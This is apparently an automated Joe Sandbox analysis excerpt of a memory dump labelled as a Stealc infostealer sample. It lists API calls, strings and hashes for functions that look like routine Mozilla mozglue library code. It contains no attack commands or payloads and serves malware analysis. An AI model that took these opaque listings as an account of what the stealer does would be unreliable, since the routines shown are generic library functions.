Part of subcall function 6BAC5E90: memset.VCRUNTIME140(6BB07765,000000E5,55CCCCCC), ref: 6BAC5F27
Part of subcall function 6BAC5E90: LeaveCriticalSection.KERNEL32(?), ref: 6BAC5FB2

GetLastError.KERNEL32(?,?,?,?,?,?,6BADD7F3), ref: 6BAAEC1A

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
String ID:
API String ID: 2948488910-0
Opcode ID: a8fcc567658ece6961563abb12e674c8447e6c8222e22d61533ed994fabb076c
Instruction ID: 6500576865b90d6ba05247ef63db6b284a8322545479127f3023c4f80601e378
Opcode Fuzzy Hash: a8fcc567658ece6961563abb12e674c8447e6c8222e22d61533ed994fabb076c
Instruction Fuzzy Hash: 39110CB1A042545BEF109B789D49B7F7AA89F02B18F244435E815EB380E379DC8487F3

Function 6BAF0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BAF0270
GetCurrentThreadId.KERNEL32 ref: 6BAF02E9
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAF02F6
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAF033A

Strings

about:blank, xrefs: 6BAF020F

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 9aa6ca832df27005b03cee4accbf8d9233da955a10a48b6a50286cf099222591
Instruction ID: 31e2e74c4c268f7623634e06e5290a70c5d7249f486c2f4ef6f6099b598c2509
Opcode Fuzzy Hash: 9aa6ca832df27005b03cee4accbf8d9233da955a10a48b6a50286cf099222591
Instruction Fuzzy Hash: 57519074900215CFCF10DF68C980AAAB7F9FF49324F54465AE929A7341D735F982CBA1

Function 6BAEE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BAB4A68), ref: 6BAE945E
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BAE9470
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BAE9482
Part of subcall function 6BAE9420: __Init_thread_footer.LIBCMT ref: 6BAE949F

GetCurrentThreadId.KERNEL32 ref: 6BAEE12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6BAEE084,00000000), ref: 6BAEE137

Part of subcall function 6BAE94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BAE94EE
Part of subcall function 6BAE94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BAE9508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6BAEE196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6BAEE1E9

Part of subcall function 6BAE99A0: GetCurrentThreadId.KERNEL32 ref: 6BAE99C1
Part of subcall function 6BAE99A0: AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAE99CE
Part of subcall function 6BAE99A0: ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAE99F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6BAEE13F

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 9bbada62a7b2e48b385333cc73fcfe61d6400268efd447e8d022a6b82669563e
Instruction ID: 04222dda969119a9b3e6eb3585e556ad0505e1f6900a8fae919b4d3b18ccd081
Opcode Fuzzy Hash: 9bbada62a7b2e48b385333cc73fcfe61d6400268efd447e8d022a6b82669563e
Instruction Fuzzy Hash: 163157B46047409FDB00DF68954137AFBE5EFC9248F04852EE8A94B241DB78C986D7B2

Function 6BAE0210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAE0222
moz_xmalloc.MOZGLUE(0000000C), ref: 6BAE0231

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAE028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6BAE02F7

Strings

@, xrefs: 6BAE02D8

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 8bd1287449205d701c8cda7762779f58243f67d3386020aa321de46e19cdfa66
Instruction ID: 5d99c835ed0b6bfc060028dbef9ee0f6f3676b4a0ac88363cb947065d5d5329d
Opcode Fuzzy Hash: 8bd1287449205d701c8cda7762779f58243f67d3386020aa321de46e19cdfa66
Instruction Fuzzy Hash: 3C31B3B1A006118FEF64CF68C881B26B7E5FF44714B14856DDA5ADB341DB35EC82CBA1

Function 6BB0AB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,6BACBFBD,.dll,00000000,00000000,00000000,6BACBFBD), ref: 6BB0ABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6BB0ABD8

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6BB0ABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6BB0AC03

Strings

.dll, xrefs: 6BB0ABB4, 6BB0ABFA

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: 15f3c0f75d7523cd7960e14eb9c538df70a79d3aae5f544e9907e081d8e97cd3
Instruction ID: 1c0e8d4b2d1d80fa4d8d3a1d65b6abf06dc33a197b1aa9af275c578c81de85a7
Opcode Fuzzy Hash: 15f3c0f75d7523cd7960e14eb9c538df70a79d3aae5f544e9907e081d8e97cd3
Instruction Fuzzy Hash: E101B5B2A0411A6FEB105E748C45EBFBAADEF96350F050435FD08E7200EABA9D544BB1

Function 6BB073E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,?,6BAB434E), ref: 6BB073EB
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6BB07404
FreeLibrary.KERNEL32(?,?,6BAB434E), ref: 6BB07413

Strings

SetProcessDpiAwarenessContext, xrefs: 6BB073FE
user32.dll, xrefs: 6BB073E6

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetProcessDpiAwarenessContext$user32.dll
API String ID: 145871493-397433131
Opcode ID: c3011f2fafd07fc1093737b547a39d9666fec8bb1bc5c3d386ad327c7a4fb604
Instruction ID: 2113395183228ef83231b4da6f73df5f6458d8d07adbd0bcda7b08f719b06d71
Opcode Fuzzy Hash: c3011f2fafd07fc1093737b547a39d9666fec8bb1bc5c3d386ad327c7a4fb604
Instruction Fuzzy Hash: 58E01A741053419BE7202FA5D808736FEE8EB05241F008C2AEA89C3214EBB6D4008B50

Function 6BAE01C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BAB7266), ref: 6BAE01C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6BAE01E7
FreeLibrary.KERNEL32(?,6BAB7266), ref: 6BAE01FE

Strings

CryptCATAdminReleaseContext, xrefs: 6BAE01E1
wintrust.dll, xrefs: 6BAE01C3

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 1544fab50889acb68b60b37d3c202abdcfb2283da3bd2e1e2a90ea39ccd344e2
Instruction ID: 63237f3e80ade70002738262fac3b61e2b9a0943d165a8951585e8aebbffce60
Opcode Fuzzy Hash: 1544fab50889acb68b60b37d3c202abdcfb2283da3bd2e1e2a90ea39ccd344e2
Instruction Fuzzy Hash: 45E07574484385DAEF10AB758809736BAE9AB07781F004427EA04CB240DF7AC4419B21

Function 6BAE0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BAB7297), ref: 6BAE0128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6BAE0147
FreeLibrary.KERNEL32(?,6BAB7297), ref: 6BAE015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6BAE0141
wintrust.dll, xrefs: 6BAE0123

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: d2a993eed375096fde8c54e2e69e7e25e562ac0c610568fa26fd8764b21420b9
Instruction ID: 314b3433ea537f03ef693d3de093d675a42ae3fffd4cc70f2840fb0f5fb5f713
Opcode Fuzzy Hash: d2a993eed375096fde8c54e2e69e7e25e562ac0c610568fa26fd8764b21420b9
Instruction Fuzzy Hash: 68E09275444245DBEF207F6AD809776BBE8B707781F00452BAA08CF344DFBAC4419B61

Function 6BB0BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6BAB05BC), ref: 6BB0BAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6BB0BAD7
FreeLibrary.KERNEL32(?,6BAB05BC), ref: 6BB0BAEC

Strings

VirtualAlloc2, xrefs: 6BB0BAD1
kernelbase.dll, xrefs: 6BB0BAB3

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 453b5499768f66a9a11da136902cbbc6b08568147e2693efe9bcd6484eee2ee6
Instruction ID: 041379a0a903b146f9b8b871422015d2f8e9ec8318f9cc88e17390a9d912184d
Opcode Fuzzy Hash: 453b5499768f66a9a11da136902cbbc6b08568147e2693efe9bcd6484eee2ee6
Instruction Fuzzy Hash: 7CE0B674410386DBEF10AF62CA18B76BFE8E706214F15042BE90497200FFBBC044CB20

Function 6BB0C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BAB77C5), ref: 6BB0C298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6BB0C2B7
FreeLibrary.KERNEL32(?,6BAB77C5), ref: 6BB0C2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6BB0C2B1
wintrust.dll, xrefs: 6BB0C293

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 9fdcce7e49551b7487fc54726b318658467a82b8bb9c39dd360b89a86860c92d
Instruction ID: 3dd6a18eec002a471352acfa46aa1c6a05d75a8e2cef320dfe7c446e411d650b
Opcode Fuzzy Hash: 9fdcce7e49551b7487fc54726b318658467a82b8bb9c39dd360b89a86860c92d
Instruction Fuzzy Hash: 04E09274441241DFEF107B69CA08772BFE8EB0A645F44062BEA088B610EBBBC404CA60

Function 6BB0C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BAB77F6), ref: 6BB0C248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6BB0C267
FreeLibrary.KERNEL32(?,6BAB77F6), ref: 6BB0C27C

Strings

wintrust.dll, xrefs: 6BB0C243
CryptCATAdminAcquireContext, xrefs: 6BB0C261

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 56918df7710c45a1cdf8b02bd15b27609d0bf980981bf367b7d948850c7b17b5
Instruction ID: c47a5dccd205d3f5d2de060e07db4cd379d1d123a63d8fa9e0f205deee132625
Opcode Fuzzy Hash: 56918df7710c45a1cdf8b02bd15b27609d0bf980981bf367b7d948850c7b17b5
Instruction Fuzzy Hash: 7BE0B674415349DBEF146F66C908B36BEE8E70B344F10486BEA04CB604EBBAC4449F64

Function 6BB0C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB0C1DE,?,00000000,?,00000000,?,6BAB779F), ref: 6BB0C1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6BB0C217
FreeLibrary.KERNEL32(?,6BB0C1DE,?,00000000,?,00000000,?,6BAB779F), ref: 6BB0C22C

Strings

WinVerifyTrust, xrefs: 6BB0C211
wintrust.dll, xrefs: 6BB0C1F3

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 63a77f3c145b384771a2181045e7878fb7964c54c1e1abea8d78946d53083d1a
Instruction ID: ab24182dffdfacbd6badb795e4190661aade0d7c4c73367496345f2a8caa57d4
Opcode Fuzzy Hash: 63a77f3c145b384771a2181045e7878fb7964c54c1e1abea8d78946d53083d1a
Instruction Fuzzy Hash: 7CE0B674404781DBEF107F75CA08736BEE8BB06644F00052BEA04DB605EBBAC4008B71

Function 6BAED210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6BAB5820,?), ref: 6BAED21F
moz_xmalloc.MOZGLUE(00000001,?,?,6BAB5820,?), ref: 6BAED22E

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6BAB5820,?), ref: 6BAED242
free.MOZGLUE(00000000,?,?,?,?,?,?,6BAB5820,?), ref: 6BAED253

Part of subcall function 6BAC5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BAC5EDB
Part of subcall function 6BAC5E90: memset.VCRUNTIME140(6BB07765,000000E5,55CCCCCC), ref: 6BAC5F27
Part of subcall function 6BAC5E90: LeaveCriticalSection.KERNEL32(?), ref: 6BAC5FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6BAB5820,?), ref: 6BAED280

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID:
API String ID: 2029485308-0
Opcode ID: a7f919311ae5c529f6e03f75ec964bdba08b10be57a6b095a3d55b67a096c564
Instruction ID: 7e594fdfd316940c76dc1ffd79540721d0d21c3556ff5914afbbcf7293a149ef
Opcode Fuzzy Hash: a7f919311ae5c529f6e03f75ec964bdba08b10be57a6b095a3d55b67a096c564
Instruction Fuzzy Hash: DF31F8B5940255AFCF00CF68C481A6EBB75BFC9704F284569D954AB301D37AE883CBE1

Function 6BAA4310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6BAA42D2), ref: 6BAA436A

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6BAA42D2), ref: 6BAA4387
moz_xmalloc.MOZGLUE(80000023,?,6BAA42D2), ref: 6BAA43B7
free.MOZGLUE(00000000,?,6BAA42D2), ref: 6BAA43EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BAA42D2), ref: 6BAA4406

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: 9f828ea7a058c21c55d95f1a1b1b1573b042d2c673758e069647ab04c22ca9ab
Instruction ID: 4224c24244737b38b45189e0b2c0a580b2e0efffd76bb78e495cef84826d74d2
Opcode Fuzzy Hash: 9f828ea7a058c21c55d95f1a1b1b1573b042d2c673758e069647ab04c22ca9ab
Instruction Fuzzy Hash: 79313972A041159FDB14EE79DC8156EB7AAEF40220B140A39F825DB380EF34E98083B2

Function 6BB00B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB00BBC

Part of subcall function 6BAC5C50: GetTickCount64.KERNEL32 ref: 6BAC5D40
Part of subcall function 6BAC5C50: EnterCriticalSection.KERNEL32(6BB2F688), ref: 6BAC5D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB00BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB00BD5

Part of subcall function 6BAC5C50: __aulldiv.LIBCMT ref: 6BAC5DB4
Part of subcall function 6BAC5C50: LeaveCriticalSection.KERNEL32(6BB2F688), ref: 6BAC5DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB00BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BB00C9A

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: cfe8a8903d4ce7c51da0328471692dd6058f19240ee3078637446a15881ebbf0
Instruction ID: ad7e278fd03479b9345794b119e526460ba6827c331d7b0b25b04d5f14136433
Opcode Fuzzy Hash: cfe8a8903d4ce7c51da0328471692dd6058f19240ee3078637446a15881ebbf0
Instruction Fuzzy Hash: 7631F771A147548ACB14DF38D49112BB7E8FF82760F504B1EF8A9A32D0DF74D8458792

Function 6BAB6390 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAB63D0
AcquireSRWLockExclusive.KERNEL32 ref: 6BAB63DF
ReleaseSRWLockExclusive.KERNEL32 ref: 6BAB640E
__Init_thread_footer.LIBCMT ref: 6BAB6467
